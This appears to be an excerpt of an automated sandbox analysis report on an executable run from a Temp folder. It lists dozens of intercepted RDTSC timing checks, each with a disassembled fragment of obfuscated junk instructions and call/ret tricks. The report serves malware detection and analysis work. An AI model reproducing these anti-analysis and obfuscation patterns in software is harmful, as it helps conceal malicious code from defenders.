Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 693F9C second address: 694007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 ja 00007F69D1080A50h 0x0000000e nop 0x0000000f mov esi, 3C87273Eh 0x00000014 push 00000000h 0x00000016 jmp 00007F69D1080A52h 0x0000001b call 00007F69D1080A49h 0x00000020 push edi 0x00000021 push edx 0x00000022 jmp 00007F69D1080A4Bh 0x00000027 pop edx 0x00000028 pop edi 0x00000029 push eax 0x0000002a jmp 00007F69D1080A57h 0x0000002f mov eax, dword ptr [esp+04h] 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 694007 second address: 694015 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F69D121AB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 694015 second address: 6940B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push edi 0x0000000a push edi 0x0000000b jmp 00007F69D1080A4Eh 0x00000010 pop edi 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push esi 0x00000017 pushad 0x00000018 push edi 0x00000019 pop edi 0x0000001a jg 00007F69D1080A46h 0x00000020 popad 0x00000021 pop esi 0x00000022 pop eax 0x00000023 mov dword ptr [ebp+122D34F2h], edi 0x00000029 push 00000003h 0x0000002b push 00000000h 0x0000002d push ecx 0x0000002e call 00007F69D1080A48h 0x00000033 pop ecx 0x00000034 mov dword ptr [esp+04h], ecx 0x00000038 add dword ptr [esp+04h], 00000015h 0x00000040 inc ecx 0x00000041 push ecx 0x00000042 ret 0x00000043 pop ecx 0x00000044 ret 0x00000045 push 00000000h 0x00000047 add dword ptr [ebp+122D3065h], eax 0x0000004d push 00000003h 0x0000004f push A7A07264h 0x00000054 jmp 00007F69D1080A4Bh 0x00000059 add dword ptr [esp], 185F8D9Ch 0x00000060 jmp 00007F69D1080A58h 0x00000065 lea ebx, dword ptr [ebp+12448DF5h] 0x0000006b xor cl, FFFFFFA1h 0x0000006e push eax 0x0000006f jns 00007F69D1080A61h 0x00000075 push eax 0x00000076 push edx 0x00000077 pushad 0x00000078 popad 0x00000079 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 694103 second address: 694108 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 69426D second address: 6942AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F69D1080A48h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 push 00000000h 0x00000027 mov dword ptr [ebp+122D2D22h], eax 0x0000002d push 2EE5475Eh 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 push esi 0x00000036 pop esi 0x00000037 pushad 0x00000038 popad 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6A5D51 second address: 6A5D63 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F69D121AB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6A5D63 second address: 6A5D69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6B4D30 second address: 6B4D44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jnc 00007F69D121AB26h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6B4D44 second address: 6B4D52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F69D1080A46h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6B2F0E second address: 6B2F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6B2F14 second address: 6B2F21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F69D1080A46h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6B2F21 second address: 6B2F25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6B31DF second address: 6B31E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6B336C second address: 6B338A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F69D121AB39h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6B3A6D second address: 6B3A73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6B3A73 second address: 6B3A78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6B3A78 second address: 6B3A7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6B3BC4 second address: 6B3BF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB32h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F69D121AB33h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6B3BF3 second address: 6B3BF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6B3D59 second address: 6B3D5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6B3D5F second address: 6B3D65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6B3D65 second address: 6B3D69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6B3D69 second address: 6B3D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6B3D6F second address: 6B3D95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007F69D121AB26h 0x0000000d push edi 0x0000000e pop edi 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F69D121AB30h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6B3D95 second address: 6B3D9A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6B4596 second address: 6B459A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6B459A second address: 6B45AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F69D1080A4Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6B45AA second address: 6B45DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 jmp 00007F69D121AB31h 0x0000000c pop ebx 0x0000000d jmp 00007F69D121AB36h 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6B472F second address: 6B473A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6B473A second address: 6B4753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F69D121AB35h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6B4BBD second address: 6B4BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6B4BC1 second address: 6B4BC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6B9DD4 second address: 6B9DD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6BA26A second address: 6BA28B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F69D121AB2Ch 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F69D121AB2Ch 0x00000014 ja 00007F69D121AB26h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6BA573 second address: 6BA577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6BA577 second address: 6BA581 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F69D121AB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6BA581 second address: 6BA59A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F69D1080A46h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f je 00007F69D1080A54h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6BA59A second address: 6BA59E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6BA6FB second address: 6BA718 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F69D1080A58h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6C0654 second address: 6C065A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6C065A second address: 6C065E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6C065E second address: 6C067B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB30h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop ecx 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6C0AC9 second address: 6C0AD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push edx 0x00000006 pop edx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6C0DB3 second address: 6C0DC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F69D121AB26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6C1029 second address: 6C1048 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6C185D second address: 6C1861 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6C18EF second address: 6C18FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6C18FA second address: 6C1931 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F69D121AB32h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push edi 0x00000015 pushad 0x00000016 jo 00007F69D121AB26h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6C1931 second address: 6C193E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6C193E second address: 6C1959 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c popad 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 jo 00007F69D121AB30h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a pop eax 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6C1D1C second address: 6C1D3D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F69D1080A4Dh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jp 00007F69D1080A48h 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6C1E02 second address: 6C1E09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6C1EC6 second address: 6C1ED3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F69D1080A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6C1ED3 second address: 6C1EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F69D121AB31h 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6C264C second address: 6C2663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F69D1080A52h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6C2663 second address: 6C2668 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6C2738 second address: 6C274B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6C274B second address: 6C2768 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F69D121AB26h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6C2B2A second address: 6C2B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F69D1080A4Ch 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6C2BC8 second address: 6C2BDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F69D121AB32h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6C2BDE second address: 6C2C2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F69D1080A48h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D333Fh], ecx 0x0000002c push eax 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F69D1080A4Ah 0x00000035 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6C3167 second address: 6C3180 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6C3B5B second address: 6C3B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6C5BD4 second address: 6C5BE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F69D121AB26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6821F5 second address: 6821F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6C623B second address: 6C6241 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6C6241 second address: 6C6245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6C6245 second address: 6C62BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D34D6h], eax 0x00000014 mov dword ptr [ebp+1245301Dh], ebx 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007F69D121AB28h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 0000001Dh 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 sub edi, 0CF43F7Ch 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push edi 0x00000041 call 00007F69D121AB28h 0x00000046 pop edi 0x00000047 mov dword ptr [esp+04h], edi 0x0000004b add dword ptr [esp+04h], 00000018h 0x00000053 inc edi 0x00000054 push edi 0x00000055 ret 0x00000056 pop edi 0x00000057 ret 0x00000058 xchg eax, ebx 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c jng 00007F69D121AB26h 0x00000062 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6C76C3 second address: 6C76DC instructions: 0x00000000 rdtsc 0x00000002 ja 00007F69D1080A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007F69D1080A46h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6C6BE3 second address: 6C6BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6C8D46 second address: 6C8D4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6CCD4D second address: 6CCD65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F69D121AB26h 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6CCD65 second address: 6CCD7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F69D1080A46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F69D1080A46h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6C9704 second address: 6C971C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6C971C second address: 6C9722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6CEE56 second address: 6CEEBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 jl 00007F69D121AB2Ch 0x0000000f xor dword ptr [ebp+122D3086h], ecx 0x00000015 push 00000000h 0x00000017 mov dword ptr [ebp+122D2CAAh], edi 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push edi 0x00000022 call 00007F69D121AB28h 0x00000027 pop edi 0x00000028 mov dword ptr [esp+04h], edi 0x0000002c add dword ptr [esp+04h], 00000019h 0x00000034 inc edi 0x00000035 push edi 0x00000036 ret 0x00000037 pop edi 0x00000038 ret 0x00000039 xchg eax, esi 0x0000003a jmp 00007F69D121AB33h 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 jnp 00007F69D121AB26h 0x00000049 jp 00007F69D121AB26h 0x0000004f popad 0x00000050 rdtsc
